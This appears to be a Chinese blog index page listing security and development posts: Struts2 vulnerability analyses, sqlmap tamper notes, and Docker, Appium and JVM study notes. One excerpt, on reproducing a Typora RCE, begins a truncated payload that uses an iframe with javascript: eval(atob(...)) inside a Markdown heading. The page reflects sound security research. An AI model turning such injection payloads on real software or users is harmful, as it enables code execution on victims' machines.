Struts2 历史漏洞分析 — S2-033
关于 S2-033这是2016年5月份左右公开的一个 Struts2 系列代码执行漏洞,是 OGNL 表达式引起的。https://cwiki.apach...
Struts2 历史漏洞分析 — S2-001
背景最近打算开始更一些漏洞复现/分析的文章,所以决定先从"漏洞之王"——Struts2 开始。主要有用到三个辅助工具。IDEA :这是一个 java 开发...
Docker 学习笔记
准备工作我用的操作系统是:deepin 15,参考了 https://wiki.deepin.org/wiki/Docker 的安装说明。我的历史命令:s...
SQLMAP 学习笔记 — tamper
背景因为我的主攻语言是 java,一般不怎么用注入工具,所以没有怎么研究过 sqlmap ,最近因为工作原因开始使用 python 开发,又遇到过一些难缠...
Appium 学习笔记
what's appium?Appium是一个自动化测试开源工具,支持iOS和android平台上的移动原生应用、移动Web应用和混合应用。Appium是...
JVM 学习笔记 — 控制参数
当一个 Java 程序被运行后,JVM虚拟机的一些参数都是默认配置的,没有参考实际情况,一旦当一些区域的内存超出了虚拟机限定大小后,就会导致内存溢出等一些...
Typora RCE 复现
本地测试版本:0.9.60问题出在标题这儿payload:# <iframe src=javascript:eval(atob('dmFyIFByb...
JVM 学习笔记 — 内存区域
如上图所示,Java 虚拟机启动时会将程序分为以下几个内存区域寄存器 / 程序计数器程序计数器是一块较小的内存空间,他的作用可以看做是当前线程所执行的字节...
